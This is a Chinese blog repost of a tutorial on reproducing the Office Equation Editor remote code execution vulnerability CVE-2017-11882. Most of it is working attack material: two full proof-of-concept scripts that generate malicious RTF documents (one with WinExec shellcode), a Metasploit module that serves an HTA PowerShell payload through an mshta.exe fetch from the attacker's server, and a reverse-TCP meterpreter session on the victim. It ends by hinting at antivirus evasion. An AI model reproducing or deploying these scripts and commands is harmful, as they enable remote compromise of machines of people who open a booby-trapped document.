Office 远程代码执行漏洞复现过程
2024-05-08 06:53:46
本文来自作者肖志华在 GitChat 上分享 「Office 远程代码执行漏洞复现过程」,「阅读原文」查看交流实录。
编辑 | 天津饭
直接贴本地复现过程,至于怎么利用还请自己思考。
2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的 Office 远程代码执行漏洞(CVE-2017-11882)。
该漏洞为 Office 内存破坏漏洞,影响目前流行的所有 Office 版本。攻击者可以利用漏洞以当前登录的用户的身份执行任意命令。
由于漏洞影响面较广,漏洞披露后,金睛安全研究团队持续对漏洞相关攻击事件进行关注。
11月19日,监控到了已有漏洞 POC 在网上流传,随即迅速对相关样本进行了分析。目前该样本全球仅微软杀毒可以检测。
漏洞影响到的版本有:
Office 365
Microsoft Office 2000
Microsoft Office 2003
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2
Microsoft Office 2013 Service Pack 1
Microsoft Office 2016
等于说,影响现在主流的 Office 版本,基本可以做到通杀。
这里我给出两个 POC。
https://github.com/embedi/CVE-2017-11882,国外黑客所写
https://github.com/Ridter/CVE-2017-11882,国内黑客所写
两个 POC 的代码我也贴在下面。
Command43b_CVE-2017-11882.py 的代码如下:
import argparse
import sysRTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}{\*\generator Riched20 6.3.9600}\viewkind4\uc1\pard\sa200\sl276\slmult1\f0\fs22\lang9"""RTF_TRAILER = R"""\par}"""OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """OBJECT_TRAILER = R"""}{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}}{\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}}{\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}}{\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0\picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}0100090000035100000000001200000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b0200000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}}"""OBJDATA_TEMPLATE = R"""01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020cea5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006f006d0070004f0062006a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004f0062006a0049006e0066006f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201ffffffff04000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b2710000000000000000000000000000000000000000000000000000000000000000000000000000000003000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141414141414141414141414141414141414141414141120c430000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004500710075006100740069006f006e0020004e00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000004000000c5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000d0000004d45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d61746854797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e657720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a600190160a000000313131313131313131310c000000320a6001100f0a000000313131313131313131310c000000320a600190070a000000313131313131313131310c000000320a600110000a000000313131313131313131310a00000026060f000a00ffffffff0100000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff7cef1800040000002d01010004000000f0010000030000000000"""COMMAND_OFFSET = 0x949*2def create_ole_exec_primitive(command):if len(command) > 43:print "[!] Primitive command must be shorter than 43 bytes"sys.exit(0)hex_command = command.encode("hex")objdata_hex_stream = OBJDATA_TEMPLATE.translate(None, "\r\n")ole_data = objdata_hex_stream[:COMMAND_OFFSET] + hex_command + objdata_hex_stream[COMMAND_OFFSET + len(hex_command):]return OBJECT_HEADER + ole_data + OBJECT_TRAILERdef create_rtf(header,command,trailer):ole1 = create_ole_exec_primitive(command + " &")# We need 2 or more commands for executing remote file from WebDAV# because WebClient service start may take some timereturn header + ole1 + trailerdef getrheader(file):input_file = open(file,"r").read()r_header = input_file.split("{\*\datastore")[0]return r_headerif __name__ == '__main__':parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882")parser.add_argument("-c", "--command", help="Command to execute.", required=True)parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)parser.add_argument("-i", "--input", help="Input normal rtf.", required=False)args = parser.parse_args()if args.input != None:r_header = getrheader(args.input)else:r_header = RTF_HEADERrtf_content = create_rtf(r_header, args.command ,RTF_TRAILER)output_file = open(args.output, "w")output_file.write(rtf_content)print "[*] Done ! output file --> " + args.output
Command109b_CVE-2017-11882.py 的代码如下:
# Original poc :https://github.com/embedi/CVE-2017-11882
# This version accepts a command with 109 bytes long in maximum.
# Sorry I don't know how to read the struct in objdata, hence I cannot modify the length parameter to aquire a arbitrary length code execution.
# But that's enough in exploitation. We can use regsvr32 to load sct file remotely.:)import argparse
import sysfrom struct import packhead=r'''{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}{\*\generator Riched20 6.3.9600}\viewkind4\uc1 \pard\sa200\sl276\slmult1\f0\fs22\lang9'''objclass=r'''{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020cea5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006f006d0070004f0062006a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004f0062006a0049006e0066006f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201ffffffff04000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000000000000000000000000000000000000000000000000000000000000000000000000000000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'''tail=r'''00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000004000000C5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C4550494354003421000035FEFFFF9201000008003421CB010000010009000003C500000002001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A600190160A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A000000313131313131313131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F0010000030000000000}{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}}{\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}}{\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}}{\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0\picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}0100090000035100000000001200000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b0200000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}}\par}'''#0: b8 44 eb 71 12 mov eax,0x1271eb44#5: ba 78 56 34 12 mov edx,0x12345678#a: 31 d0 xor eax,edx#c: 8b 08 mov ecx,DWORD PTR [eax]#e: 8b 09 mov ecx,DWORD PTR [ecx]#10: 8b 09 mov ecx,DWORD PTR [ecx]#12: 66 83 c1 3c add cx,0x3c#16: 31 db xor ebx,ebx#18: 53 push ebx#19: 51 push ecx#1a: be 64 3e 72 12 mov esi,0x12723e64#1f: 31 d6 xor esi,edx#21: ff 16 call DWORD PTR [esi] // call WinExec#23: 53 push ebx#24: 66 83 ee 4c sub si,0x4c#28: ff 10 call DWORD PTR [eax] // call ExitProcessstage1="\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10"# pads with nop
stage1=stage1.ljust(44,'\x90')def genrtf(cmd,r_head):if len(cmd) > 109:print "[!] Primitive command must be shorter than 109 bytes"sys.exit(0)payload='\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ'payload+=stage1payload+=pack('<I',0x00402114) # retpayload+='\x00'*2payload+=cmdpayload=payload.ljust(197,'\x00')return r_head+objclass+payload.encode('hex')+taildef getrheader(file):input_file = open(file,"r").read()r_header = input_file.split("{\*\datastore")[0]return r_header if __name__ == '__main__':parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882")parser.add_argument("-c", "--cmd", help="Command run in target system", required=True)parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)parser.add_argument("-i", "--input", help="Input normal rtf.", required=False)args = parser.parse_args()if args.input != None:r_header = getrheader(args.input)else:r_header = headwith open(args.output,'wb') as f:f.write(genrtf(args.cmd,r_header))f.close()print "[*] Done ! output file --> " + args.output
利用到的工具如下:
Windows7
Office2013
Metasploit
利用的过程如下:
打开上面的 Command43b_CVE-2017-11882.py 的脚本,测试一下 DOC 文件。
使用命令如下:
python Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o cve.doc
使用这条命令后会在目录里生成一个名为 cve.doc 的 doc 文件,拿到 Windows7 靶机去打开看看效果。如下图所示。
Windows7 打开恶意 doc 文件后,系统调用的计算器已经弹出,证明该 POC 是可行的(为什么要弹计算器……这个梗已经被众多黑客玩烂了……)。
MSF 进行漏洞利用
现在就需要一个 rb 脚本来和 MSF 进行交互,具体操作如下。
首先需要在 MSF 里添加这个脚本,如果 MSF 没有作改动,路径应该是 /usr/share/metasploit-framework/modules/exploits/windows,可以在这目录下新建一个文件夹。
将下面的脚本写入到 PS_shell.rb。
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework
##class MetasploitModule < Msf::Exploit::RemoteRank = NormalRankinginclude Msf::Exploit::Remote::HttpServerdef initialize(info = {})super(update_info(info,'Name' => 'Microsoft Office Payload Delivery','Description' => %q{This module generates an command to place withina word document, that when executed, will retrieve a HTA payloadvia HTTP from an web server. Currently have not figured out howto generate a doc.},'License' => MSF_LICENSE,'Arch' => ARCH_X86,'Platform' => 'win','Targets' =>[['Automatic', {} ],],'DefaultTarget' => 0,))enddef on_request_uri(cli, _request)print_status("Delivering payload")p = regenerate_payload(cli)data = Msf::Util::EXE.to_executable_fmt(framework,ARCH_X86,'win',p.encoded,'hta-psh',{ :arch => ARCH_X86, :platform => 'win '})send_response(cli, data, 'Content-Type' => 'application/hta')enddef primerurl = get_uriprint_status("Place the following DDE in an MS document:")print_line("mshta.exe \"#{url}\"")endend
打开 MSF 后,搜搜漏洞利用模块。
msf > PS_shell
如下图所示。
使用该模块
msf > use exploit/windows/CVE-2017-11882/PS_shell
如下图所示。
上图的操作过程如下:
msf exploit(PS_shell) > set payload windows/meterpreter/reverse_tcp //设置payload为反弹TCP连接payload => windows/meterpreter/reverse_tcpmsf exploit(PS_shell) > set lhost 192.168.30.128 //设置本机IPlhost => 172.16.253.76msf exploit(PS_shell) > set URIPATH test //设置URI地址URIPATH => abcmsf exploit(PS_shell) > show options //检查配置Module options (exploit/windows/CVE-2017-11882/PS_shell):Name Current Setting Required Description---- --------------- -------- -----------SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0SRVPORT 8080 yes The local port to listen on.SSL false no Negotiate SSL for incoming connectionsSSLCert no Path to a custom SSL certificate (default is randomly generated)URIPATH test no The URI to use for this exploit (default is random)Payload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)LHOST 192.168.30.128 yes The listen addressLPORT 4444 yes The listen portExploit target:Id Name-- ----0 Automatic
配置无误后即可执行,执行后 MSF 会监听本地8080端口,如果机器打开 doc 就会触发,反弹 shell 建立会话。
msf exploit(PS_shell) > exploit -j[*] Exploit running as background job.[*] Started reverse TCP handler on 192.168.30.128:4444 msf exploit(PS_shell) > [*] Using URL: http://0.0.0.0:8080/test[*] Local IP: http://192.168.30.128:8080/test[*] Server started.[*] Place the following DDE in an MS document:mshta.exe "http://192.168.30.128:8080/test"
此时这个 test 显然不是一份 doc 格式的文件,我们需要用到刚刚用的 py 脚本文件,生成一份恶意的 doc 文件。
生成恶意 doc 文件
如下图所示。
这个时候,拿 test1.doc 文件到 Windows7 去打开试试,如下图所示。
Windows7 打开效果
如下图所示。
MSF 监听效果
如下图所示。
可以看到 MSF 已经和 Windows7 建立起了连接,此种攻击方式利用的是 powershell 反弹,打开恶意 doc 文档的时候会一闪而逝的“Poweshell”窗口。
net user
如下图所示。
到此漏洞复现完成。说点其他的,现在的攻击方式可不止 EXE 文件这种方式。
样本文件360会扫描识别到并且拦截,因为调用了 powershell,类似于恶意动作,360会报警。
但是可以用免杀处理一下,至于怎么处理,就看各位的功夫了。
一般人不会想到恶意 doc 文档攻击,尽量小心陌生人发来的东西,可能不止是 EXE 文件,doc 也可能会充满恶意。
近期热文
《如何高效开启你的顾问人生模式》
《Python 机器学习 Scikit-learn 完全入门指南》
《那些精贵的文献资源下载网址经验总结》
《Java 架构师眼中的 HTTP 协议》
《OpenVPN 的穿墙远程连接旅程》
《前端跨域问题各种解决方案》
《程序员跳槽时,如何高效地准备面试?》
「阅读原文」看交流实录,你想知道的都在这里
Office 远程代码执行漏洞复现过程相关推荐
- [系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...
- Windows漏洞:MS08-067远程代码执行漏洞复现及深度防御
摘要:详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程 本文分享自华为云社区<Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御>,作者 ...
- Office远程代码执行漏洞补丁(905413)
Office远程代码执行漏洞补丁(905413) 微软在安全公告MS06-012中介绍了这个Office远程代码执行漏洞(905413)及其补丁的详细情况.该补丁安全等级为高危级,影响Office 2 ...
- ThinkPHP 5.0.23 远程代码执行 漏洞复现
ThinkPHP 5.0.23 远程代码执行 漏洞复现 一.漏洞描述 二.漏洞影响 三.漏洞复现 1. 环境搭建 2. 漏洞复现 四.漏洞POC 五.参考链接 六.利用工具 一.漏洞描述 ThinkP ...
- 用友NC BeanShell远程代码执行漏洞复现
用友NC远程代码执行漏洞复现 漏洞介绍 用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一.该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接 ...
- IIS_CVE-2017-7269 IIS6.0远程代码执行漏洞复现
CVE-2017-7269 IIS6.0远程代码执行漏洞复现 一.漏洞描述 IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁. 二.影响版 ...
- 隐藏17年的Office远程代码执行漏洞(CVE-2017-11882)
Preface 这几天关于Office的一个远程代码执行漏洞很流行,昨天也有朋友发了相关信息,于是想复现一下看看,复现过程也比较简单,主要是简单记录下. 利用脚本Github传送地址 ,后面的参考链接 ...
- CVE-2022-30190 MSDT远程代码执行漏洞复现
目录 0x01 声明: 0x02 简介: 0x03 漏洞概述: 0x04 影响版本: 0x05 环境搭建: 0x06 漏洞复现: 是否存在利用点: CMD执行: 生成docx文件利用: 0x07 CS ...
- CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞 复现
1 漏洞信息 漏洞名称 Spring Cloud Function SpEL 远程代码执行漏洞 漏洞编号 CVE-2022-22963 危害等级 高危 CVSS评分 7.5 漏洞类型 中间件漏洞 漏洞 ...
最新文章
- ACM题集以及各种总结大全(转)
- 分享:根据svg节点对象类型和路径值转换坐标值
- 2018-08-13 Head First OO分析设计一书略读与例子中文化
- python变量后面加星号_Python基础找茬系列20--python函数的秘密
- Java操作某方法时报错:java.lang.NoSuchMethodError
- 关于计算机优点缺点的英语作文,跪求一篇英语作文 题目:论计算机的优缺点...
- 洛谷——P1590 失踪的7
- express 模板 及 文件上传
- java pgp加密_GPG(pgp)加解密中文完整教程
- NumPy学习笔记之zeros_like()函数(包含zeros函数)
- 关于SQLyog的破解注册码
- java视频生成缩略图_Java中使用ffmpeg生成视频缩略图
- 计算机键盘锁不了怎么办,笔记本电脑键盘没反应是哪个键锁了?该怎么办
- 移动硬盘制作DOS启动盘的方法
- Js逆向教程19-websocket介绍
- 微软今天发布的紧急安全公告 MS08-067
- 涂鸦智能平台——mcu+nbiot
- Qt开源VS Dock项目Qt-Advanced-Docking-System简单使用
- Python实战-折线图生成
- 解决vscode中文乱码